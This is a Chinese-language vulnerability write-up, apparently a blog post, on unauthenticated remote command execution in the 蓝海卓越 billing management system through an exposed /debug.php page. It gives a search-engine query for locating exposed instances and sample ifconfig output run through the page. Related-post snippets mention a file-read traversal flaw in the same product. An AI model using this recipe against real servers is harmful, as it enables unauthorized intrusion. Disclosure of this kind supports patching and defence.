蓝海卓越计费管理系统 debug.php 远程命令执行漏洞
漏洞描述
i ⭐
蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行
漏洞影响
s ✅
蓝海卓越计费管理系统
空间测绘
d ⭕
Hunter:web.title="蓝海卓越计费管理系统"
漏洞复现
- ✅访问首页
- ✅执行Payload命令,访问路径/debug.php
$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:21:9B:FB:30:27
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16eth1 Link encap:Ethernet HWaddr 00:21:9B:FB:30:28
inet addr:172.16.99.6 Bcast:172.16.99.7 Mask:255.255.255.252
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:123192928 errors:0 dropped:0 overruns:0 frame:0
TX packets:48841089 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:24857251549 (23.1 GiB) TX bytes:4622552427 (4.3 GiB)
Interrupt:17lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:622930078 errors:0 dropped:0 overruns:0 frame:0
TX packets:622930078 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:66863293134 (62.2 GiB) TX bytes:66863293134 (62.2 GiB)Execute Shell command
Command:
ifconfig
个人博客
孤桜懶契:https://gylq.gitee.io/time
蓝海卓越计费管理系统 debug.php 远程命令执行漏洞相关推荐
- 蓝海卓越计费管理系统 debug.php_未授权RCE
文章目录 Fofa搜索:title=="蓝海卓越计费管理系统". 点开第一个搜索结果: /debug.php未授权访问,文件提供一个命令执行的接口: 输入Poc验证 ...
- 蓝海卓越 计费管理系统 download.php 任意文件读取漏洞
漏洞描述: 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件. 漏洞利用条件: / 漏洞影响范围: / 漏洞复现: 1.P ...
- 蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现 一.概述 蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通 ...
- 亿赛通电子文档安全管理系统dataimport远程命令执行漏洞
1.漏洞描述 亿赛通电子文档安全管理系统dataimport存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令. 2.网络资产查找 FOFA:title="电子文档安全管理系统&q ...
- Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)
今天 Spring 框架更新了一条可能造成 RCE(远程命令执行漏洞)的问题代码,如图: 随即在国内安全圈炸开了锅,大家纷纷转发一张图: 上次因为核弹级漏洞 log4j2 的 POC 公开,大批企业为 ...
- 浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224 此文章仅供用于学习研究,严禁用于非法用途,否则后果自负. 漏洞简介 浪潮服务器群集管理系统存在危险字符未过滤,导 ...
- 邮件传输代理Exim远程命令执行漏洞细节披露,影响全球近一半邮件服务器
注意:是远程命令执行,不是远程代码执行 Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件.该软件主要运行于类UNIX系统 ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- 【注意】关于Redis存在远程命令执行漏洞的安全公告
点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...
最新文章
- 浅谈Activiti Modeler 的扩展
- SQL Server中如何识别、查找未使用的索引(unused indexes)
- 介绍微软一个罕为人知的无敌命令
- sql中实现取得某字段中数字值
- 打造自己的装机U盘(二)
- java 逐行写入csv_go|使用go读写CSV文件
- C语言爆炸干货,小白你还不来看看嘛!
- 现在进行时和一般现在时的将来时态_39
- 经常听到一些老板说,你来公司上班就只是为了赚钱吗?
- sql还原数据库备份数据库_有关数据库备份,还原和恢复SQL面试问题–第三部分
- js生成vCard,以及格式参数详细说明
- 【POJ1328】Radar Installation(贪心,决策包容)
- (转)扰码Scrambling和扩频码(PN码)的区别
- HP服务器远程管理工具iLO详细介绍
- linux jconsole 监控jvm,JVM监测分析JConsole
- 如何将谷歌浏览器指定网页的背景颜色调成黑色,其他网页背景颜色不变——以HDLBits为例
- 小白鼠测试---VR头戴设备-暴风魔镜4
- 牛与马的把表情包(带有改进)
- FPGA串口之RS-485
- Dynamic Movement Primitives与UR5机械臂仿真